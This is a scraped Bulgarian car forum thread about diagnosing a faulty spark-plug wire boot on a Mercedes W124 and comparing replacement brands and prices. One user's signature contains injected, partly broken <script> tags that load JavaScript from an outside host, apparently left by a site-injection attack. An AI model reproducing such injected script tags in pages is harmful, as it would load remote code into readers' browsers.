Кабели......
Започната от SYSO, 08 ное 2007 - 13:01:14
18 мнения по тази тема
Публикувано 08 ноември 2007 - 13:01
Здравейте!!!
Скоро смених свещите на колата (124 230 ТЕ) щото като е студена докато се затопли тресеше и си личи просто че някой от цилиндрите прекъсва!!!
Сложих NGK BP6 EFS като за нея.Проблема не се оправи. Тази сутрин скачам в колата и пак на студено почна да прекъсва.
Зимам аз омметъра и разкачих сички кабели. Знам че съпротивлението на кабелите трябва да е 1 К ом. меря ги един по един и какво се оказа.първият 1.25 К ома , втория 1.15 К ома , третия 1,25 К ома. до тук са си в нормата горе долу.
Четвъртия обаче не даде никаква верига.
Запалих пак и чакам като до сега да се оправи като поработи.Е след малко се оправи. Вадя пак четвъртия кабел и го меря пак няма верига.
С малко опанати нерви почнах да чопля лулата на кабела и достигнах до място където кабела се отвърта на резба от лулата. мерих кабела и си беше здрав.Но лулата няма никой.
Интересно ми е дали може да се смени само лула която да е 1К ом или пък да се смени само този кабел . (капачка палец сичко проверено)
Благодаря на отзовалите се???
Скоро смених свещите на колата (124 230 ТЕ) щото като е студена докато се затопли тресеше и си личи просто че някой от цилиндрите прекъсва!!!
Сложих NGK BP6 EFS като за нея.Проблема не се оправи. Тази сутрин скачам в колата и пак на студено почна да прекъсва.
Зимам аз омметъра и разкачих сички кабели. Знам че съпротивлението на кабелите трябва да е 1 К ом. меря ги един по един и какво се оказа.първият 1.25 К ома , втория 1.15 К ома , третия 1,25 К ома. до тук са си в нормата горе долу.
Четвъртия обаче не даде никаква верига.
Запалих пак и чакам като до сега да се оправи като поработи.Е след малко се оправи. Вадя пак четвъртия кабел и го меря пак няма верига.
С малко опанати нерви почнах да чопля лулата на кабела и достигнах до място където кабела се отвърта на резба от лулата. мерих кабела и си беше здрав.Но лулата няма никой.
Интересно ми е дали може да се смени само лула която да е 1К ом или пък да се смени само този кабел . (капачка палец сичко проверено)
Благодаря на отзовалите се???
W 123 300 TD
W 124 230 TE
W 210 290 TD
W 124 230 TE
W 210 290 TD
Публикувано 08 ноември 2007 - 13:45
Ааа и тъй като на там отиват нещата , някой да знае цени на кабели. На мене ми говорят за някви Английски за 38 лв ама нещо не ми звучат добре .Дали стават ???
W 123 300 TD
W 124 230 TE
W 210 290 TD
W 124 230 TE
W 210 290 TD
Публикувано 08 ноември 2007 - 15:35
Ако е 38 лева единия кабел - може
Досега изглежда кабели не си купувал, лошо няма, имай предвид че за цена 38 лева не е ясно какво ще получиш. Представи си - литър масло за 5,80 лева или гума за 40 лева, или ароматизатор за 0,70 лева...
Кабелите са 80-120 лева. Не смея да се доверя на нищо по-евтино. Друг е въпросът ако ти е препоръчано от човек, на който имаш доверие - ти си решаваш. Това е мойто мнение. Не претендирам да съм разбирач или познавач.
Досега изглежда кабели не си купувал, лошо няма, имай предвид че за цена 38 лева не е ясно какво ще получиш. Представи си - литър масло за 5,80 лева или гума за 40 лева, или ароматизатор за 0,70 лева...
Кабелите са 80-120 лева. Не смея да се доверя на нищо по-евтино. Друг е въпросът ако ти е препоръчано от човек, на който имаш доверие - ти си решаваш. Това е мойто мнение. Не претендирам да съм разбирач или познавач.
брабус написа: "абе само аз ли спуквам тьрсачката?"
Публикувано 08 ноември 2007 - 18:00
1 бр. САМО ЛУЛА от БС е 30лв
по-добро от оригинала няма да намериш, но излиза адски скъпо
по-добро от оригинала няма да намериш, но излиза адски скъпо
Публикувано 08 ноември 2007 - 19:41
Намерих единични кабели на следните цени(само лула не намирам). Bosch - 35 lv. Beru - 36 lv. Как мислите дали стават, като са толкоз мангизи единия???Или пак няма гаранция.???
W 123 300 TD
W 124 230 TE
W 210 290 TD
W 124 230 TE
W 210 290 TD
Публикувано 08 ноември 2007 - 19:57
За цени на кабели в ст. загора единствено съм проверявал в магазин на бош който се намира до кръговото на стадион берое. цените са различни в зависимост за кой цилиндър са , според дължината. за 4-ти цилиндър /най-дългия/ ми си върти цена около 50-60 лв. не знам дали продават само лули.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
Публикувано 08 ноември 2007 - 19:59
Ами след като имаш проблем само с единия смени само него. Оригиналният ти е беру така че ....Аз взех на Tesla -72 лв. и съм доволен.
Публикувано 08 ноември 2007 - 21:06
моето мнение е да си купиш един кабел с лула 2ра употреба (като разбира се го пробваш преди да го платиш ) защото качество като на частите за първично вграждане няма да намериш никъде на пазара за авто части а следващият път когато ти се БУШОНДИСА кабел ги смени всичките наведнъж за да не се занимаваш с кабели ден през ден ...
Публикувано 08 ноември 2007 - 21:11
po dobre si smeni celija kabel.Az imah su6ija problem. Smenih go i vsi4ko se opravi.Suvet: samo i edinstveno BOSH
Публикувано 08 ноември 2007 - 21:17
братле наскоро някъде четах че bosch са преместили почети цялото си производство в братска турция така че явно вече трябва да ги наричаме boschlaf незнам дали все още може да им се има воверие но то ще се чуе - да не стане само като със свещите им ...
Публикувано 08 ноември 2007 - 21:28
Казваш-Тесла(ударениета пада на е -нали)Ами след като имаш проблем само с единия смени само него. Оригиналният ти е беру така че ....Аз взех на Tesla -72 лв. и съм доволен.
Едно време приказката беше-(Тесла-на а,Тунгсрам и Наш срам)
Дано вече не е така
Шофьорски стаж ... 28-29г.
За повече контакти - купете си разклонител
Публикувано 09 ноември 2007 - 08:07
Скоро сменях кабел .Сложих на Бош 35 лв и съм доволен нямам оплаквания, а според мен такива работи не се купуват втора употреба.
Публикувано 09 ноември 2007 - 09:02
Аз съм със 123-ка,не знам,дали ще станат за другите модели..Един човечец ми каза:"Вземи си един комплект за Лада-Нива,струва 9 лв.(целия комплект) "...Вече карам 2 г. с тях-хубави,меки кабели(силиконови)-никакви ядове!!!Нямам представа дали разните омове и тем подобни пасват...ама щом кара толкова време,значи е О.К. ...пък и не на последно място е ценичката-9.00 BGL
"Марката е като живо същество-нейният авторитет расте или се уронва все повече с течение на времето..."
Публикувано 09 ноември 2007 - 13:35
Аз съм със 123-ка,не знам,дали ще станат за другите модели..Един човечец ми каза:"Вземи си един комплект за Лада-Нива,струва 9 лв.(целия комплект) "...Вече карам 2 г. с тях-хубави,меки кабели(силиконови)-никакви ядове!!!Нямам представа дали разните омове и тем подобни пасват...ама щом кара толкова време,значи е О.К. ...пък и не на последно място е ценичката-9.00 BGL
пък и 200 вдига
Публикувано 09 ноември 2007 - 17:21
Да ама със свещи"ВМЗ"пък и 200 вдига
Шега приятели
Нищо лично
Шофьорски стаж ... 28-29г.
За повече контакти - купете си разклонител
1 потребител(и) четат тази тема
0 потребители, 1 гости, 0 анонимни